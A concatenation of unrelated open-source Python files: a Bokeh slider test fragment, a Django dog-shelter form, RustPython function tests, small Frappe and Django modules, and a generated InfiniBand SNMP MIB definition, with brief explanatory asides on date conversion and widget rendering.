                                value=(start, convert_date_to_datetime(end)))
        assert s.value_as_date == (start, end)
        s = mws.DateRangeSlider(start=start, end=end,
                                value=(convert_date_to_datetime(start), end))
        assert s.value_as_date == (start, end)
#-----------------------------------------------------------------------------
# Dev API
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Private API
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Code
#-----------------------------------------------------------------------------
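The comments in the timestamp tests above refer to Bokeh's convention of serializing date values as milliseconds since the Unix epoch. The conversion itself can be sketched in plain Python (`to_epoch_ms` is an illustrative helper, not Bokeh's actual `convert_datetime_type`):

```python
from datetime import datetime, timezone

def to_epoch_ms(dt: datetime) -> float:
    """Milliseconds since the Unix epoch; naive datetimes are treated as UTC."""
    if dt.tzinfo is None:
        dt = dt.replace(tzinfo=timezone.utc)
    return dt.timestamp() * 1000.0

# The epoch itself maps to 0.0, and one day later is 86,400,000 ms.
print(to_epoch_ms(datetime(1970, 1, 2)))  # 86400000.0
```

A slider value set from the client side arrives in this unit, which is why the tests above round-trip through `convert_datetime_type` / `convert_date_to_datetime` before comparing.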


# --- Apis/canino/forms.py (fredmanre/RefugioPerro, MIT) ---
from django import forms
from Apis.canino.models import Perro


class PerroForm(forms.ModelForm):
    # TODO: Define other fields here

    class Meta:
        model = Perro
        fields = [
            'nombre',
            'sexo',
            'raza',
            'edad',
            'rescate',
            'adoptante',
            'vacuna',
        ]
        labels = {
            'nombre': 'Nombre',
            'sexo': 'Sexo',
            'raza': 'Raza',
            'edad': 'Edad',
            'rescate': 'fecha de rescate o ingreso',
            'adoptante': 'Adoptante',
            'vacuna': 'Vacunas',
        }
        widgets = {
            'nombre': forms.TextInput(attrs={'class': 'form-control'}),
            'sexo': forms.Select(attrs={'class': 'form-control'}),
            'raza': forms.Select(attrs={'class': 'form-control'}),
            'edad': forms.TextInput(attrs={'class': 'form-control'}),
            'rescate': forms.TextInput(attrs={'class': 'form-control'}),
            'adoptante': forms.Select(attrs={'class': 'form-control'}),
            'vacuna': forms.CheckboxSelectMultiple(),
        }
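The `widgets` mapping above attaches the Bootstrap `form-control` class to each field's rendered input. A rough hand-rolled illustration of the effect (this is not Django's renderer; `render_text_input` is a hypothetical stand-in):

```python
def render_text_input(name, attrs):
    """Sketch of how a TextInput-style widget turns `attrs` into HTML attributes."""
    attr_str = "".join(f' {k}="{v}"' for k, v in sorted(attrs.items()))
    return f'<input type="text" name="{name}"{attr_str}>'

print(render_text_input("nombre", {"class": "form-control"}))
# <input type="text" name="nombre" class="form-control">
```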


# --- tests/snippets/function.py (sanxiyn/RustPython, MIT) ---
from testutils import assert_raises
__name__ = "function"


def foo():
    """test"""
    return 42

assert foo() == 42
assert foo.__doc__ == "test"
assert foo.__name__ == "foo"
assert foo.__qualname__ == "foo"
assert foo.__module__ == "function"


def my_func(a,):
    return a + 2

assert my_func(2) == 4


def fubar():
    return 42,

assert fubar() == (42,)


def f1():
    """test1"""
    pass

assert f1.__doc__ == "test1"


def f2():
    '''test2'''
    pass

assert f2.__doc__ == "test2"


def f3():
    """
    test3
    """
    pass

assert f3.__doc__ == "\n    test3\n    "


def f4():
    "test4"
    pass

assert f4.__doc__ == "test4"


def revdocstr(f):
    d = f.__doc__
    d = d + 'w00t'
    f.__doc__ = d
    return f


@revdocstr
def f5():
    """abc"""

assert f5.__doc__ == 'abcw00t', f5.__doc__


def f6():
    def nested():
        pass

    assert nested.__name__ == "nested"
    assert nested.__qualname__ == "f6.<locals>.nested"

f6()


def f7():
    try:
        def t() -> void:  # noqa: F821
            pass
    except NameError:
        return True
    return False

assert f7()


def f8() -> int:
    return 10

assert f8() == 10

with assert_raises(SyntaxError):
    exec('print(keyword=10, 20)')


# --- metalgrafica/metalgrafica/doctype/plantilla_de_grupo_de_productos/plantilla_de_grupo_de_productos.py (Nirchains/metal, MIT) ---
# -*- coding: utf-8 -*-
# Copyright (c) 2017, Pedro Antonio Fernández Gómez and contributors
# For license information, please see license.txt
from __future__ import unicode_literals
import frappe
from frappe.model.document import Document
class Plantilladegrupodeproductos(Document):
    def validate(self):
        from erpnext.utilities.transaction_base import validate_uom_is_integer
        validate_uom_is_integer(self, "stock_uom", "qty", "BOM Item")


# --- dynamo/__init__.py (xing-lab-pitt/dynamo-release, BSD-3-Clause) ---
"""Mapping Vector Field of Single Cells
"""
from .get_version import get_version
__version__ = get_version(__file__)
del get_version
from . import pp
from . import est
from . import tl
from . import vf
from . import pd
from . import pl
from . import mv
from . import sim
from .data_io import *
from . import sample_data
from . import configuration
from . import ext
from .get_version import get_all_dependencies_version
from .dynamo_logger import (
    Logger,
    LoggerManager,
    main_tqdm,
    main_info,
    main_warning,
    main_critical,
    main_exception,
)
# alias
config = configuration


# --- resolwe/flow/tests/fields_test_app/models.py (zagm/resolwe, Apache-2.0) ---
# pylint: disable=missing-docstring
from versionfield import VersionField
from django.db import models
from resolwe.flow.models.fields import ResolweSlugField
class TestModel(models.Model):
    name = models.CharField(max_length=30)
    slug = ResolweSlugField(populate_from='name', unique_with='version')
    version = VersionField(default='0.0.0')


# --- pysnmp/IB-SMA-MIB.py (agustinhenze/mibs.snmplabs.com, Apache-2.0) ---
#
# PySNMP MIB module IB-SMA-MIB (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/IB-SMA-MIB
# Produced by pysmi-0.3.4 at Mon Apr 29 19:39:05 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
Integer, OctetString, ObjectIdentifier = mibBuilder.importSymbols("ASN1", "Integer", "OctetString", "ObjectIdentifier")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
ConstraintsUnion, ValueRangeConstraint, ValueSizeConstraint, SingleValueConstraint, ConstraintsIntersection = mibBuilder.importSymbols("ASN1-REFINEMENT", "ConstraintsUnion", "ValueRangeConstraint", "ValueSizeConstraint", "SingleValueConstraint", "ConstraintsIntersection")
IbDataPortAndInvalid, IbUnicastLid, IbMulticastLid, infinibandMIB, IbDataPort, IbGuid, IbSmPortList = mibBuilder.importSymbols("IB-TC-MIB", "IbDataPortAndInvalid", "IbUnicastLid", "IbMulticastLid", "infinibandMIB", "IbDataPort", "IbGuid", "IbSmPortList")
SnmpAdminString, = mibBuilder.importSymbols("SNMP-FRAMEWORK-MIB", "SnmpAdminString")
ModuleCompliance, NotificationGroup, ObjectGroup = mibBuilder.importSymbols("SNMPv2-CONF", "ModuleCompliance", "NotificationGroup", "ObjectGroup")
TimeTicks, Counter64, MibScalar, MibTable, MibTableRow, MibTableColumn, Counter32, iso, Bits, Gauge32, MibIdentifier, NotificationType, IpAddress, Integer32, ObjectIdentity, ModuleIdentity, Unsigned32 = mibBuilder.importSymbols("SNMPv2-SMI", "TimeTicks", "Counter64", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "Counter32", "iso", "Bits", "Gauge32", "MibIdentifier", "NotificationType", "IpAddress", "Integer32", "ObjectIdentity", "ModuleIdentity", "Unsigned32")
TextualConvention, DisplayString, TruthValue = mibBuilder.importSymbols("SNMPv2-TC", "TextualConvention", "DisplayString", "TruthValue")
ibSmaMIB = ModuleIdentity((1, 3, 6, 1, 3, 117, 3))
ibSmaMIB.setRevisions(('2005-09-01 12:00',))
if mibBuilder.loadTexts: ibSmaMIB.setLastUpdated('200509011200Z')
if mibBuilder.loadTexts: ibSmaMIB.setOrganization('IETF IP Over IB (IPOIB) Working Group')
ibSmaObjects = MibIdentifier((1, 3, 6, 1, 3, 117, 3, 1))
ibSmaNotifications = MibIdentifier((1, 3, 6, 1, 3, 117, 3, 2))
ibSmaConformance = MibIdentifier((1, 3, 6, 1, 3, 117, 3, 3))
ibSmaNodeInfo = MibIdentifier((1, 3, 6, 1, 3, 117, 3, 1, 1))
ibSmaNodeString = MibScalar((1, 3, 6, 1, 3, 117, 3, 1, 1, 1), SnmpAdminString().subtype(subtypeSpec=ValueSizeConstraint(1, 64))).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaNodeString.setStatus('current')
ibSmaNodeBaseVersion = MibScalar((1, 3, 6, 1, 3, 117, 3, 1, 1, 2), Unsigned32().subtype(subtypeSpec=ValueRangeConstraint(1, 255))).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaNodeBaseVersion.setStatus('current')
ibSmaNodeClassVersion = MibScalar((1, 3, 6, 1, 3, 117, 3, 1, 1, 3), Unsigned32().subtype(subtypeSpec=ValueRangeConstraint(1, 255))).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaNodeClassVersion.setStatus('current')
ibSmaNodeType = MibScalar((1, 3, 6, 1, 3, 117, 3, 1, 1, 4), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4))).clone(namedValues=NamedValues(("channelAdapter", 1), ("switch", 2), ("router", 3), ("reserved", 4)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaNodeType.setStatus('current')
ibSmaNodeNumPorts = MibScalar((1, 3, 6, 1, 3, 117, 3, 1, 1, 5), Unsigned32().subtype(subtypeSpec=ValueRangeConstraint(0, 254))).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaNodeNumPorts.setStatus('current')
ibSmaSystemImageGuid = MibScalar((1, 3, 6, 1, 3, 117, 3, 1, 1, 6), IbGuid()).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaSystemImageGuid.setStatus('current')
ibSmaNodeGuid = MibScalar((1, 3, 6, 1, 3, 117, 3, 1, 1, 7), IbGuid()).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaNodeGuid.setStatus('current')
ibSmaNodePortGuid = MibScalar((1, 3, 6, 1, 3, 117, 3, 1, 1, 8), IbGuid()).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaNodePortGuid.setStatus('current')
ibSmaNodePartitionTableNum = MibScalar((1, 3, 6, 1, 3, 117, 3, 1, 1, 9), Unsigned32().subtype(subtypeSpec=ValueRangeConstraint(1, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaNodePartitionTableNum.setStatus('current')
ibSmaNodeDeviceId = MibScalar((1, 3, 6, 1, 3, 117, 3, 1, 1, 10), OctetString().subtype(subtypeSpec=ValueSizeConstraint(2, 2)).setFixedLength(2)).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaNodeDeviceId.setStatus('current')
ibSmaNodeRevision = MibScalar((1, 3, 6, 1, 3, 117, 3, 1, 1, 11), OctetString().subtype(subtypeSpec=ValueSizeConstraint(4, 4)).setFixedLength(4)).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaNodeRevision.setStatus('current')
ibSmaNodeLocalPortNumOrZero = MibScalar((1, 3, 6, 1, 3, 117, 3, 1, 1, 12), Unsigned32().subtype(subtypeSpec=ValueRangeConstraint(0, 254))).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaNodeLocalPortNumOrZero.setStatus('current')
ibSmaNodeVendorId = MibScalar((1, 3, 6, 1, 3, 117, 3, 1, 1, 13), OctetString().subtype(subtypeSpec=ValueSizeConstraint(3, 3)).setFixedLength(3)).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaNodeVendorId.setStatus('current')
ibSmaNodeLid = MibScalar((1, 3, 6, 1, 3, 117, 3, 1, 1, 14), Unsigned32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("accessiblefornotify")
if mibBuilder.loadTexts: ibSmaNodeLid.setStatus('current')
ibSmaNodePortNum = MibScalar((1, 3, 6, 1, 3, 117, 3, 1, 1, 15), IbDataPort()).setMaxAccess("accessiblefornotify")
if mibBuilder.loadTexts: ibSmaNodePortNum.setStatus('current')
ibSmaNodeMethod = MibScalar((1, 3, 6, 1, 3, 117, 3, 1, 1, 16), Unsigned32().subtype(subtypeSpec=ValueRangeConstraint(0, 255))).setMaxAccess("accessiblefornotify")
if mibBuilder.loadTexts: ibSmaNodeMethod.setStatus('current')
ibSmaNodeAttributeId = MibScalar((1, 3, 6, 1, 3, 117, 3, 1, 1, 17), Unsigned32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("accessiblefornotify")
if mibBuilder.loadTexts: ibSmaNodeAttributeId.setStatus('current')
ibSmaNodeAttributeModifier = MibScalar((1, 3, 6, 1, 3, 117, 3, 1, 1, 18), Unsigned32().subtype(subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess("accessiblefornotify")
if mibBuilder.loadTexts: ibSmaNodeAttributeModifier.setStatus('current')
ibSmaNodeKey = MibScalar((1, 3, 6, 1, 3, 117, 3, 1, 1, 19), OctetString().subtype(subtypeSpec=ValueSizeConstraint(8, 8)).setFixedLength(8)).setMaxAccess("accessiblefornotify")
if mibBuilder.loadTexts: ibSmaNodeKey.setStatus('current')
ibSmaNodeLid2 = MibScalar((1, 3, 6, 1, 3, 117, 3, 1, 1, 20), Unsigned32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("accessiblefornotify")
if mibBuilder.loadTexts: ibSmaNodeLid2.setStatus('current')
ibSmaNodeServiceLevel = MibScalar((1, 3, 6, 1, 3, 117, 3, 1, 1, 21), Unsigned32().subtype(subtypeSpec=ValueRangeConstraint(0, 15))).setMaxAccess("accessiblefornotify")
if mibBuilder.loadTexts: ibSmaNodeServiceLevel.setStatus('current')
ibSmaNodeQueuePair1 = MibScalar((1, 3, 6, 1, 3, 117, 3, 1, 1, 22), Unsigned32().subtype(subtypeSpec=ValueRangeConstraint(0, 16777215))).setMaxAccess("accessiblefornotify")
if mibBuilder.loadTexts: ibSmaNodeQueuePair1.setStatus('current')
ibSmaNodeQueuePair2 = MibScalar((1, 3, 6, 1, 3, 117, 3, 1, 1, 23), Unsigned32().subtype(subtypeSpec=ValueRangeConstraint(0, 16777215))).setMaxAccess("accessiblefornotify")
if mibBuilder.loadTexts: ibSmaNodeQueuePair2.setStatus('current')
ibSmaNodeGid1 = MibScalar((1, 3, 6, 1, 3, 117, 3, 1, 1, 24), OctetString().subtype(subtypeSpec=ValueSizeConstraint(16, 16)).setFixedLength(16)).setMaxAccess("accessiblefornotify")
if mibBuilder.loadTexts: ibSmaNodeGid1.setStatus('current')
ibSmaNodeGid2 = MibScalar((1, 3, 6, 1, 3, 117, 3, 1, 1, 25), OctetString().subtype(subtypeSpec=ValueSizeConstraint(16, 16)).setFixedLength(16)).setMaxAccess("accessiblefornotify")
if mibBuilder.loadTexts: ibSmaNodeGid2.setStatus('current')
ibSmaNodeCapMask = MibScalar((1, 3, 6, 1, 3, 117, 3, 1, 1, 26), OctetString().subtype(subtypeSpec=ValueSizeConstraint(4, 4)).setFixedLength(4)).setMaxAccess("accessiblefornotify")
if mibBuilder.loadTexts: ibSmaNodeCapMask.setStatus('current')
ibSmaNodeSwitchLid = MibScalar((1, 3, 6, 1, 3, 117, 3, 1, 1, 27), Unsigned32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("accessiblefornotify")
if mibBuilder.loadTexts: ibSmaNodeSwitchLid.setStatus('current')
ibSmaNodeDataValid = MibScalar((1, 3, 6, 1, 3, 117, 3, 1, 1, 28), Bits().clone(namedValues=NamedValues(("lidaddr1", 0), ("lidaddr2", 1), ("pkey", 2), ("sl", 3), ("qp1", 4), ("qp2", 5), ("gidaddr1", 6), ("gidaddr2", 7)))).setMaxAccess("accessiblefornotify")
if mibBuilder.loadTexts: ibSmaNodeDataValid.setStatus('current')
ibSmaSwitchInfo = MibIdentifier((1, 3, 6, 1, 3, 117, 3, 1, 2))
ibSmaSwLinearFdbTableNum = MibScalar((1, 3, 6, 1, 3, 117, 3, 1, 2, 1), Unsigned32().subtype(subtypeSpec=ValueRangeConstraint(0, 49151))).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaSwLinearFdbTableNum.setStatus('current')
ibSmaSwRandomFdbTableNum = MibScalar((1, 3, 6, 1, 3, 117, 3, 1, 2, 2), Unsigned32().subtype(subtypeSpec=ValueRangeConstraint(0, 49151))).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaSwRandomFdbTableNum.setStatus('current')
ibSmaSwMulticastFdbTableNum = MibScalar((1, 3, 6, 1, 3, 117, 3, 1, 2, 3), Unsigned32().subtype(subtypeSpec=ValueRangeConstraint(0, 16383))).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaSwMulticastFdbTableNum.setStatus('current')
ibSmaSwLinearFdbTop = MibScalar((1, 3, 6, 1, 3, 117, 3, 1, 2, 4), Unsigned32().subtype(subtypeSpec=ValueRangeConstraint(0, 49151))).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaSwLinearFdbTop.setStatus('current')
ibSmaSwDefaultPort = MibScalar((1, 3, 6, 1, 3, 117, 3, 1, 2, 5), Unsigned32().subtype(subtypeSpec=ValueRangeConstraint(0, 254))).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaSwDefaultPort.setStatus('current')
ibSmaSwDefMcastPriPort = MibScalar((1, 3, 6, 1, 3, 117, 3, 1, 2, 6), Unsigned32().subtype(subtypeSpec=ValueRangeConstraint(0, 254))).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaSwDefMcastPriPort.setStatus('current')
ibSmaSwDefMcastNotPriPort = MibScalar((1, 3, 6, 1, 3, 117, 3, 1, 2, 7), Unsigned32().subtype(subtypeSpec=ValueRangeConstraint(0, 254))).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaSwDefMcastNotPriPort.setStatus('current')
ibSmaSwLifeTimeValue = MibScalar((1, 3, 6, 1, 3, 117, 3, 1, 2, 8), Unsigned32().subtype(subtypeSpec=ValueRangeConstraint(0, 20))).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaSwLifeTimeValue.setStatus('current')
ibSmaSwPortStateChange = MibScalar((1, 3, 6, 1, 3, 117, 3, 1, 2, 9), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaSwPortStateChange.setStatus('current')
ibSmaSwLidsPerPort = MibScalar((1, 3, 6, 1, 3, 117, 3, 1, 2, 10), Unsigned32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaSwLidsPerPort.setStatus('current')
ibSmaSwPartitionEnforceNum = MibScalar((1, 3, 6, 1, 3, 117, 3, 1, 2, 11), Unsigned32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaSwPartitionEnforceNum.setStatus('current')
ibSmaSwInboundEnforceCap = MibScalar((1, 3, 6, 1, 3, 117, 3, 1, 2, 12), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaSwInboundEnforceCap.setStatus('current')
ibSmaSwOutboundEnforceCap = MibScalar((1, 3, 6, 1, 3, 117, 3, 1, 2, 13), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaSwOutboundEnforceCap.setStatus('current')
ibSmaSwFilterRawPktInputCap = MibScalar((1, 3, 6, 1, 3, 117, 3, 1, 2, 14), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaSwFilterRawPktInputCap.setStatus('current')
ibSmaSwFilterRawPktOutputCap = MibScalar((1, 3, 6, 1, 3, 117, 3, 1, 2, 15), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaSwFilterRawPktOutputCap.setStatus('current')
ibSmaSwEnhancedPort0 = MibScalar((1, 3, 6, 1, 3, 117, 3, 1, 2, 16), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaSwEnhancedPort0.setStatus('current')
ibSmaGuidInfo = MibIdentifier((1, 3, 6, 1, 3, 117, 3, 1, 3))
ibSmaGuidInfoTable = MibTable((1, 3, 6, 1, 3, 117, 3, 1, 3, 1), )
if mibBuilder.loadTexts: ibSmaGuidInfoTable.setStatus('current')
ibSmaGuidInfoEntry = MibTableRow((1, 3, 6, 1, 3, 117, 3, 1, 3, 1, 1), ).setIndexNames((0, "IB-SMA-MIB", "ibSmaGuidPortIndex"), (0, "IB-SMA-MIB", "ibSmaGuidIndex"))
if mibBuilder.loadTexts: ibSmaGuidInfoEntry.setStatus('current')
ibSmaGuidPortIndex = MibTableColumn((1, 3, 6, 1, 3, 117, 3, 1, 3, 1, 1, 1), IbDataPort())
if mibBuilder.loadTexts: ibSmaGuidPortIndex.setStatus('current')
ibSmaGuidIndex = MibTableColumn((1, 3, 6, 1, 3, 117, 3, 1, 3, 1, 1, 2), Unsigned32().subtype(subtypeSpec=ValueRangeConstraint(1, 255)))
if mibBuilder.loadTexts: ibSmaGuidIndex.setStatus('current')
ibSmaGuidVal = MibTableColumn((1, 3, 6, 1, 3, 117, 3, 1, 3, 1, 1, 3), IbGuid()).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaGuidVal.setStatus('current')
ibSmaMgmtPortInfo = MibIdentifier((1, 3, 6, 1, 3, 117, 3, 1, 4))
ibSmaPortMKey = MibScalar((1, 3, 6, 1, 3, 117, 3, 1, 4, 1), OctetString().subtype(subtypeSpec=ValueSizeConstraint(8, 8)).setFixedLength(8)).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaPortMKey.setStatus('current')
ibSmaPortGidPrefix = MibScalar((1, 3, 6, 1, 3, 117, 3, 1, 4, 2), OctetString().subtype(subtypeSpec=ValueSizeConstraint(8, 8)).setFixedLength(8)).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaPortGidPrefix.setStatus('current')
ibSmaPortLid = MibScalar((1, 3, 6, 1, 3, 117, 3, 1, 4, 3), Unsigned32().subtype(subtypeSpec=ValueRangeConstraint(0, 49151))).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaPortLid.setStatus('current')
ibSmaPortMasterSmLid = MibScalar((1, 3, 6, 1, 3, 117, 3, 1, 4, 4), Unsigned32().subtype(subtypeSpec=ValueRangeConstraint(0, 49151))).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaPortMasterSmLid.setStatus('current')
ibSmaPortIsSubnetManager = MibScalar((1, 3, 6, 1, 3, 117, 3, 1, 4, 5), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaPortIsSubnetManager.setStatus('current')
ibSmaPortIsNoticeSupported = MibScalar((1, 3, 6, 1, 3, 117, 3, 1, 4, 6), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaPortIsNoticeSupported.setStatus('current')
ibSmaPortIsTrapSupported = MibScalar((1, 3, 6, 1, 3, 117, 3, 1, 4, 7), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaPortIsTrapSupported.setStatus('current')
ibSmaPortIsAutoMigrateSupported = MibScalar((1, 3, 6, 1, 3, 117, 3, 1, 4, 8), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaPortIsAutoMigrateSupported.setStatus('current')
ibSmaPortIsSlMappingSupported = MibScalar((1, 3, 6, 1, 3, 117, 3, 1, 4, 9), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaPortIsSlMappingSupported.setStatus('current')
ibSmaPortIsMKeyNvram = MibScalar((1, 3, 6, 1, 3, 117, 3, 1, 4, 10), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaPortIsMKeyNvram.setStatus('current')
ibSmaPortIsPKeyNvram = MibScalar((1, 3, 6, 1, 3, 117, 3, 1, 4, 11), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaPortIsPKeyNvram.setStatus('current')
ibSmaPortIsLedInfoSupported = MibScalar((1, 3, 6, 1, 3, 117, 3, 1, 4, 12), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaPortIsLedInfoSupported.setStatus('current')
ibSmaPortIsSmDisabled = MibScalar((1, 3, 6, 1, 3, 117, 3, 1, 4, 13), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaPortIsSmDisabled.setStatus('current')
ibSmaPortIsSysImgGuidSupported = MibScalar((1, 3, 6, 1, 3, 117, 3, 1, 4, 14), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaPortIsSysImgGuidSupported.setStatus('current')
ibSmaPortIsPKeyExtPortTrapSup = MibScalar((1, 3, 6, 1, 3, 117, 3, 1, 4, 15), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaPortIsPKeyExtPortTrapSup.setStatus('current')
ibSmaPortIsCommManageSupported = MibScalar((1, 3, 6, 1, 3, 117, 3, 1, 4, 16), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaPortIsCommManageSupported.setStatus('current')
ibSmaPortIsSnmpTunnelSupported = MibScalar((1, 3, 6, 1, 3, 117, 3, 1, 4, 17), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaPortIsSnmpTunnelSupported.setStatus('current')
ibSmaPortIsReinitSupported = MibScalar((1, 3, 6, 1, 3, 117, 3, 1, 4, 18), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaPortIsReinitSupported.setStatus('current')
ibSmaPortIsDevManageSupported = MibScalar((1, 3, 6, 1, 3, 117, 3, 1, 4, 19), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaPortIsDevManageSupported.setStatus('current')
ibSmaPortIsVendorClassSupported = MibScalar((1, 3, 6, 1, 3, 117, 3, 1, 4, 20), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaPortIsVendorClassSupported.setStatus('current')
ibSmaPortIsDrNoticeSupported = MibScalar((1, 3, 6, 1, 3, 117, 3, 1, 4, 21), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaPortIsDrNoticeSupported.setStatus('current')
ibSmaPortIsCapMaskNoticSupported = MibScalar((1, 3, 6, 1, 3, 117, 3, 1, 4, 22), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaPortIsCapMaskNoticSupported.setStatus('current')
ibSmaPortIsBootMgmtSupported = MibScalar((1, 3, 6, 1, 3, 117, 3, 1, 4, 23), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaPortIsBootMgmtSupported.setStatus('current')
ibSmaPortMKeyLeasePeriod = MibScalar((1, 3, 6, 1, 3, 117, 3, 1, 4, 24), Unsigned32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setUnits('seconds').setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaPortMKeyLeasePeriod.setStatus('current')
ibSmaPortMKeyProtectBits = MibScalar((1, 3, 6, 1, 3, 117, 3, 1, 4, 25), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4))).clone(namedValues=NamedValues(("noMKeyProtection", 1), ("succeedWithReturnKey", 2), ("succeedWithReturnZeroes", 3), ("failOnNoMatch", 4)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaPortMKeyProtectBits.setStatus('current')
ibSmaPortMasterSmSl = MibScalar((1, 3, 6, 1, 3, 117, 3, 1, 4, 26), Unsigned32().subtype(subtypeSpec=ValueRangeConstraint(0, 15))).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaPortMasterSmSl.setStatus('current')
ibSmaPortInitTypeLoad = MibScalar((1, 3, 6, 1, 3, 117, 3, 1, 4, 27), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaPortInitTypeLoad.setStatus('current')
ibSmaPortInitTypeContent = MibScalar((1, 3, 6, 1, 3, 117, 3, 1, 4, 28), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaPortInitTypeContent.setStatus('current')
ibSmaPortInitTypePresence = MibScalar((1, 3, 6, 1, 3, 117, 3, 1, 4, 29), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaPortInitTypePresence.setStatus('current')
ibSmaPortInitTypeResuscitate = MibScalar((1, 3, 6, 1, 3, 117, 3, 1, 4, 30), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaPortInitTypeResuscitate.setStatus('current')
ibSmaPortInitNoLoadReply = MibScalar((1, 3, 6, 1, 3, 117, 3, 1, 4, 31), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaPortInitNoLoadReply.setStatus('current')
ibSmaPortInitPreserveContReply = MibScalar((1, 3, 6, 1, 3, 117, 3, 1, 4, 32), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaPortInitPreserveContReply.setStatus('current')
ibSmaPortInitPreservePresReply = MibScalar((1, 3, 6, 1, 3, 117, 3, 1, 4, 33), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaPortInitPreservePresReply.setStatus('current')
ibSmaPortMKeyViolations = MibScalar((1, 3, 6, 1, 3, 117, 3, 1, 4, 34), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaPortMKeyViolations.setStatus('current')
ibSmaPortPKeyViolations = MibScalar((1, 3, 6, 1, 3, 117, 3, 1, 4, 35), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaPortPKeyViolations.setStatus('current')
ibSmaPortQKeyViolations = MibScalar((1, 3, 6, 1, 3, 117, 3, 1, 4, 36), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaPortQKeyViolations.setStatus('current')
